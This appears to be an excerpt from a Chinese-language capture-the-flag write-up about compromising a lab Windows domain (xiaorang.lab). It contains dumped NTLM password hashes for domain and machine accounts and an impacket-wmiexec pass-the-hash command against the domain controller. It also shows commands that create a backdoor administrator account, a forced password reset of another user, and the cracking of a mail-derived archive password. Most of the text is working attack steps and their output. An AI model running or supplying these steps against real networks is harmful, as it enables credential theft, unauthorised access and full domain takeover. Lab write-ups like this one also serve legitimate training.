xiaorang.lab\HealthMailboxf5f7dbd:1143:aad3b435b51404eeaad3b435b51404ee:e7e4f69b43b92fb37d8e9b20848e6b66:::
xiaorang.lab\HealthMailbox67dc103:1144:aad3b435b51404eeaad3b435b51404ee:4fe68d094e3e797cfc4097e5cca772eb:::
xiaorang.lab\HealthMailbox320fc73:1145:aad3b435b51404eeaad3b435b51404ee:0c3d5e9fa0b8e7a830fcf5acaebe2102:::
xiaorang.lab\Lumia:1146:aad3b435b51404eeaad3b435b51404ee:862976f8b23c13529c2fb1428e710296:::
Zhangtong:1147:aad3b435b51404eeaad3b435b51404ee:22c7f81993e96ac83ac2f3f1903de8b4:::
XIAORANG-WIN16$:1000:aad3b435b51404eeaad3b435b51404ee:dd18b4953ead739587f9d1a9d362447d:::
XIAORANG-EXC01$:1103:aad3b435b51404eeaad3b435b51404ee:55808f50f5667934c73c555eab651b32:::
XIAORANG-PC$:1104:aad3b435b51404eeaad3b435b51404ee:c46d67460ae8f54e3f498adfbdc4e78a:::
[*] Cleaning up...
连接 DC 拿到 flag04
proxychains impacket-wmiexec xiaorang.lab/Administrator@172.22.3.2 -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb -dc-ip 172.22.3.2
flag3
刚刚抓取的hash还看到了lumia用户,再看一下前面整理的
172.22.3.12 本机
172.22.3.2 XIAORANG-WIN16 DC
172.22.3.9 XIAORANG-EXC01 Exchange
172.22.3.26 XIAORANG-PC
可以得知应该是XIAORANG-PC这台机器
给刚刚拿下的域控加个管理员用户,然后登录域控的机子
net user test2 Abcd1234 /add
net localgroup administrators test2 /add
登录域控后直接改lumia密码
改成:
Abcd1234
rdp登录,看到加密压缩包
翻邮件,拿到知道压缩包密码是手机号,导出爆破得到
18763918468
拿到flag
